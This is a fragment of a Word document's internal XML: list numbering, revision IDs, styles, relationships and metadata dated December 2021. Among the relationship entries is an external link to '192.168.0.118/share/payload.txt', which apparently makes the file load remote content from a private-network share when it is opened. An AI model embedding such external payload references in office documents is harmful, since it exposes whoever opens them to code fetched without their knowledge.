    <w:sectPr w:rsidR="00FC52CE" w:rsidRPr="00CA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D49"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AFF247DC"/>
    <w:lvl w:ilvl="0" w:tplc="BBC63788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1A93D3D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D5C47ABA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212A1085"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC46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DC3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="152CB1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245B1A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D0879D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8182280"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F324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DE4C04"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D132F46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FE33BAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="937803D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43F2566D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="78DC1486"/>
    <w:lvl w:ilvl="0" w:tplc="4F0028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420B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3C3E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47EAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="125233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24B1B47"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="682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47583"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8BA230F2"/>
    <w:lvl w:ilvl="0" w:tplc="A0B2358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60083"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A360297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14D6836"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3AF6621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5A3330C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="152CB1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98775E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83F27C86"/>
    <w:lvl w:ilvl="0" w:tplc="2DCE86E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C0C1F66"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="537C36EC"/>
    <w:lvl w:ilvl="0" w:tplc="04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17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5"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="16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19"/>
    <w:rsid w:val="00003A93"/>
    <w:rsid w:val="000B5A8B"/>
    <w:rsid w:val="002571BF"/>
    <w:rsid w:val="0027145A"/>
    <w:rsid w:val="00280402"/>
    <w:rsid w:val="002B0108"/>
    <w:rsid w:val="00392CBA"/>
    <w:rsid w:val="003C768D"/>
    <w:rsid w:val="0041376F"/>
    <w:rsid w:val="00425CE5"/>
    <w:rsid w:val="004525B3"/>
    <w:rsid w:val="004C5149"/>
    <w:rsid w:val="004C5BD6"/>
    <w:rsid w:val="004F0233"/>
    <w:rsid w:val="005063BD"/>
    <w:rsid w:val="00555704"/>
    <w:rsid w:val="00563BD8"/>
    <w:rsid w:val="005924B6"/>
    <w:rsid w:val="005F57F7"/>
    <w:rsid w:val="00641D45"/>
    <w:rsid w:val="00672AFE"/>
    <w:rsid w:val="006B45E1"/>
    <w:rsid w:val="006C4EF0"/>
    <w:rsid w:val="006F5C86"/>
    <w:rsid w:val="006F5D18"/>
    <w:rsid w:val="0071278E"/>
    <w:rsid w:val="00733F74"/>
    <w:rsid w:val="007413E6"/>
    <w:rsid w:val="00755C94"/>
    <w:rsid w:val="00802F4E"/>
    <w:rsid w:val="00855096"/>
    <w:rsid w:val="008E5B19"/>
    <w:rsid w:val="008F3730"/>
    <w:rsid w:val="00964B28"/>
    <w:rsid w:val="00A224BF"/>
    <w:rsid w:val="00A32012"/>
    <w:rsid w:val="00A551ED"/>
    <w:rsid w:val="00A72B29"/>
    <w:rsid w:val="00AB3E88"/>
    <w:rsid w:val="00AC5AF0"/>
    <w:rsid w:val="00AC5FA6"/>
    <w:rsid w:val="00AE3EE6"/>
    <w:rsid w:val="00AF5E4F"/>
    <w:rsid w:val="00B70E35"/>
    <w:rsid w:val="00BF18C5"/>
    <w:rsid w:val="00C327AE"/>
    <w:rsid w:val="00C70F08"/>
    <w:rsid w:val="00C75CA7"/>
    <w:rsid w:val="00C835F1"/>
    <w:rsid w:val="00C91906"/>
    <w:rsid w:val="00C97657"/>
    <w:rsid w:val="00CA5C59"/>
    <w:rsid w:val="00CC7DD8"/>
    <w:rsid w:val="00CE717E"/>
    <w:rsid w:val="00D01A05"/>
    <w:rsid w:val="00D35AED"/>
    <w:rsid w:val="00D47778"/>
    <w:rsid w:val="00E4136C"/>
    <w:rsid w:val="00E61EFA"/>
    <w:rsid w:val="00E9708A"/>
    <w:rsid w:val="00EA412C"/>
    <w:rsid w:val="00EB6178"/>
    <w:rsid w:val="00EE6290"/>
    <w:rsid w:val="00F60033"/>
    <w:rsid w:val="00FC2AD3"/>
    <w:rsid w:val="00FC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87AC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6D680098-3CFB-4548-9A15-E41B4C4F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3F74"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00733F74"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EB6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vi.wikipedia.org/wiki/Microsoft_Acces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192.168.0.118/share/payload.txt" TargetMode="External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6007-3789-4E27-A5E0-88395F1D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1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ũng</cp:lastModifiedBy>
  <cp:revision>33</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-17T01:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-19T01:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>